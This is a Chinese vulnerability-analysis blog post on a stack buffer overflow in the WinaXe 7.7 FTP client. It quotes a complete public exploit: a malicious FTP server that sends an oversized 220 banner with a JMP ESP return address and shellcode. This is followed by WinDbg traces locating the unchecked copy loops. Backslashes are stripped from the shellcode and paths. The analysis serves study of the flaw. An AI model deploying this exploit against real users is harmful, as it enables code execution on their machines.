这个漏洞是K0师傅博客上复现过的漏洞
之前在分析Windows漏洞的时候,我会非常依赖IDA的反编译,但如果漏洞触发的逻辑比较复杂,那分析出漏洞原因和漏洞触发点的过程会就会比较费力。
这里完全利用windbg来进行分析来确定漏洞产生的原因,漏洞的触发点,以及POC的编写逻辑,另外非常感谢K0师傅提供的分析思路
import socket,struct
#WinaXe v7.7 FTP Client 'Service Ready' Command Buffer Overflow Exploit
#Discovery hyp3rlinx
#ISR: ApparitionSec
#hyp3rlinx.altervista.org
#shellcode to pop calc.exe Windows 7 SP1
sc=("x31xF6x56x64x8Bx76x30x8Bx76x0Cx8Bx76x1Cx8B"
"x6Ex08x8Bx36x8Bx5Dx3Cx8Bx5Cx1Dx78x01xEBx8B"
"x4Bx18x8Bx7Bx20x01xEFx8Bx7Cx8FxFCx01xEFx31"
"xC0x99x32x17x66xC1xCAx01xAEx75xF7x66x81xFA"
"x10xF5xE0xE2x75xCFx8Bx53x24x01xEAx0FxB7x14"
"x4Ax8Bx7Bx1Cx01xEFx03x2Cx97x68x2Ex65x78x65"
"x68x63x61x6Cx63x54x87x04x24x50xFFxD5xCC")
eip=struct.pack('<L',0x68084A6F) #POP ECX RET
jmpesp=struct.pack('<L',0x68017296) #JMP ESP
#We will do POP ECX RET and place a JMP ESP address at the RET address that will jump to shellcode.
payload="A"*2061+eip+jmpesp+"x90"*10+sc+"x90"*20 #Server Ready '220' Exploit
port = 21
s = socket.socket()
host = '127.0.0.1'
s.bind((host, port))
s.listen(5)
print 'Evil FTPServer listening...'
while True:
conn, addr = s.accept()
conn.send('220'+payload+'rn')
conn.close()
使用POC会发现直接弹出了计算器,这里由于我使用环境和这个POC作者的环境不同,POC里的eip并没有被使用,修改jmpesp,程序成功crash,用kb查看到栈回溯,ftp+0x2cc32即为漏洞触发路径上的一个返回地址
0:001> g
!SETTRUE 0x680d0858(ff0.468): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
02e2d4e8 000a add byte ptr [edx],cl ds:002b:41414141=??
0:001:x86> kb
*** WARNING: Unable to verify checksum for C:UsersPublicProgram FilesLabF.comWinaXeftp.exe
*** ERROR: Module load completed but symbols could not be loaded for C:UsersPublicProgram FilesLabF.comWinaXeftp.exe
ChildEBP RetAddr Args to Child
WARNING: Frame IP not in any known module. Following frames may be wrong.
02e2d4e8 0042cc32 41303232 41414141 41414141 0x2e2d4e8
02e2d4ec 41303232 41414141 41414141 41414141 ftp+0x2cc32
02e2d4f0 41414141 41414141 41414141 41414141 0x41303232
02e2d4f4 41414141 41414141 41414141 41414141 0x41414141
0042cc2b 89e0 mov eax,esp
0042cc2d e86579fdff call ftp+0x4597 (00404597)
0042cc32 e918ffffff jmp ftp+0x2cb4f (0042cb4f)
步入 ftp+0x4597 (00404597)函数,并单步发现是 image00000000_00400000+0x4502 (00404502)导致的crash
0:001:x86>
image00000000_00400000+0x45a9:
004045a9 e854ffffff call image00000000_00400000+0x4502 (00404502)
更改POC中的jmpesp的值为原来的值,重新执行POC,并步入image00000000_00400000+0x4502 (00404502)函数,可以发现函数ret时已经成功跳转到我们布置的jmpesp处,所以漏洞触发点即为004045a9处的函数调用
0:001:x86>
image00000000_00400000+0x4595:
00404595 5b pop ebx
0:001:x86>
image00000000_00400000+0x4596:
00404596 c3 ret
0:001:x86>
*** WARNING: Unable to verify checksum for C:UsersPublicProgram FilesLabF.comWinaXeWCMDPA10.dll
*** ERROR: Module load completed but symbols could not be loaded for C:UsersPublicProgram FilesLabF.comWinaXeWCMDPA10.dll
WCMDPA10+0x17296:
68017296 54 push esp
0:001:x86>
WCMDPA10+0x17297:
68017297 c20400 ret 4
接下来分析漏洞产生的原因
为了找到漏洞产生的原因,这里再次断到0042cc2d,发现栈已经被破坏,说明漏洞原因在0042cc2d之前,因此更改POC,使其不会crash,找到0042cc2d的上层函数 0042c17f
0042cc2b 89e0 mov eax,esp
0042cc2d e86579fdff call ftp+0x4597 (00404597)
0042cc32 e918ffffff jmp ftp+0x2cb4f (0042cb4f)
0:001:x86>
image00000000_00400000+0x2c99a:
0042c99a c3 ret
0:001:x86>
image00000000_00400000+0x2c184:
0042c184 83f8ff cmp eax,0FFFFFFFFh
0:001:x86> ub 0042c184
image00000000_00400000+0x2c166:
0042c166 0fbfd3 movsx edx,bx
0042c169 89f8 mov eax,edi
0042c16b 8915dce84500 mov dword ptr [image00000000_00400000+0x5e8dc (0045e8dc)],edx
0042c171 e8caf6ffff call image00000000_00400000+0x2b840 (0042b840)
0042c176 a300514600 mov dword ptr [image00000000_00400000+0x65100 (00465100)],eax
0042c17b 85c0 test eax,eax
0042c17d 7c6e jl image00000000_00400000+0x2c1ed (0042c1ed)
0042c17f e80c070000 call image00000000_00400000+0x2c890 (0042c890)
进入0042c17f,并单步调试, 调试过程中发现在栈中复制值的情况,且没有检查长度,只判断了是否为结束符
!SETTRUE 0x680d0858Breakpoint 0 hit
image00000000_00400000+0x2c17f:
0042c17f e80c070000 call image00000000_00400000+0x2c890 (0042c890)
0:001:x86> t
image00000000_00400000+0x2c890:
0042c890 53 push ebx
0:001:x86> u 0042cbed L10
image00000000_00400000+0x2cbed:
0042cbed 8db42404200000 lea esi,[esp+2004h]
0042cbf4 89e7 mov edi,esp
0042cbf6 57 push edi
0042cbf7 8a06 mov al,byte ptr [esi]
0042cbf9 8807 mov byte ptr [edi],al
0042cbfb 3c00 cmp al,0
0042cbfd 7410 je image00000000_00400000+0x2cc0f (0042cc0f)
0042cbff 8a4601 mov al,byte ptr [esi+1]
0042cc02 83c602 add esi,2
0042cc05 884701 mov byte ptr [edi+1],al
0042cc08 83c702 add edi,2
0042cc0b 3c00 cmp al,0
0042cc0d 75e8 jne image00000000_00400000+0x2cbf7 (0042cbf7)
0042cc0f 5f pop edi
继续分析发现上面的溢出并不是后续crash的直接原因,跟踪发现在004045a9的函数内部,还有一次复制到栈上的过程,这一过程直接导致了004045a9在ret时eip被控制
漏洞产生和触发的具体的逻辑如下
0042c17f {
0042cbed edi 2 esi 复制数据到栈上
0042cc2d {
004045a9 { 触发漏洞的函数
00404524 { 再次复制数据到栈上 042fd4ec <= 漏洞产生点
0:001:x86> u 00430832 L10
image00000000_00400000+0x30832:
00430832 8a0a mov cl,byte ptr [edx]
00430834 8808 mov byte ptr [eax],cl
00430836 80f900 cmp cl,0
00430839 7411 je image00000000_00400000+0x3084c (0043084c)
0043083b 8a4a01 mov cl,byte ptr [edx+1]
0043083e 83c202 add edx,2
00430841 884801 mov byte ptr [eax+1],cl
00430844 83c002 add eax,2
00430847 80f900 cmp cl,0
0043084a 75e6 jne image00000000_00400000+0x30832 (00430832)
0043084c 58 pop eax
0043084d 59 pop ecx
0043084e c3 ret
}
ret <= 漏洞触发点
}
}
}
POC即控制eip之后通过jmp esp 将eip 转移到栈上执行shellcode即可
0:001:x86> r
eax=00000000 ebx=68084a6f ecx=41414141 edx=41414141 esi=41414141 edi=41414141
eip=00404596 esp=043fd4e4 ebp=00000899 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
image00000000_00400000+0x4596:
00404596 c3 ret
0:001:x86> p
WCMDPA10+0x17296:
68017296 54 push esp
0:001:x86> r
eax=00000000 ebx=68084a6f ecx=41414141 edx=41414141 esi=41414141 edi=41414141
eip=68017296 esp=043fd4e8 ebp=00000899 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
WCMDPA10+0x17296:
68017296 54 push esp
0:001:x86> p
WCMDPA10+0x17297:
68017297 c20400 ret 4
0:001:x86> u esp
043fd4e4 e8d43f0490 call 944414bd
043fd4e9 90 nop
043fd4ea 90 nop
043fd4eb 90 nop
043fd4ec 90 nop
043fd4ed 90 nop
043fd4ee 90 nop
043fd4ef 90 nop
0:001:x86> p
043fd4e8 90 nop
原文始发于微信公众号(3072):WINAXE FTP客户端 漏洞分析(二)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论